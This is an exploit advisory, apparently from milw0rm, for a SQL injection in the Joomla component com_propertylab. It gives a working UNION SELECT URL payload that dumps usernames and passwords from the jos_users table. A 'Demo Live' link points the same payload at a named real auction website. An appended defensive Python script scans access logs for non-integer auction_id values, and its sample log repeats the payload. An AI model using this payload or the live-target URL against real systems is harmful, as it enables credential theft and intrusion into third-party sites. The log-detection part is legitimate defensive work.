--------------------------------------------------------------------------
Joomla Component com_propertylab (auction_id) SQL injection Vulnerability
--------------------------------------------------------------------------

###################################################
[+] Author        :  Chip D3 Bi0s
[+] Email         :  chipdebios[alt+64]gmail.com
[+] Group         :  LatinHackTeam
[+] Vulnerability :  SQL injection
###################################################

Example:
http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26 : +and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users

Demo Live (1):
http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users

Thanks for all Str0ke and you are unbeatable :)

+++++++++++++++++++++++++++++++++
[!] Produced in South America
---------------------------------

# milw0rm.com [2009-07-10]
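
Log check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web server access logs for com_propertylab requests whose auction_id is not a plain integer. The combined log format, the constructed sample lines, the function name suspicious_requests and the assumption that legitimate auction_id values are integers (like the 26 in the example URL) are all assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); hosts and IPs are
# documentation values, not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Jul/2009:10:01:02 +0000] "GET /index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2009:10:03:44 +0000] "GET /index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users HTTP/1.1" 200 4811 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2009:10:03:59 +0000] "GET /index.php?option=com_propertylab&task=propertysearch&auction_id=26%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Jul/2009:10:05:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, timestamp and request target from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate auction_id is a plain non-negative integer.
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_requests(log_text):
    """Return (client_ip, timestamp, auction_id) for com_propertylab requests
    whose auction_id is anything other than a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        # parse_qs URL-decodes values, so %20 and '+' both surface as spaces.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_propertylab" not in params.get("option", []):
            continue
        for value in params.get("auction_id", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((ip, ts, value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts}  {ip}  auction_id={value!r}")
```

Matching on "not an integer" rather than on SQL keywords also catches encoded or differently cased variants; the same allow-list test applied server-side to auction_id before it reaches the query is the corresponding fix.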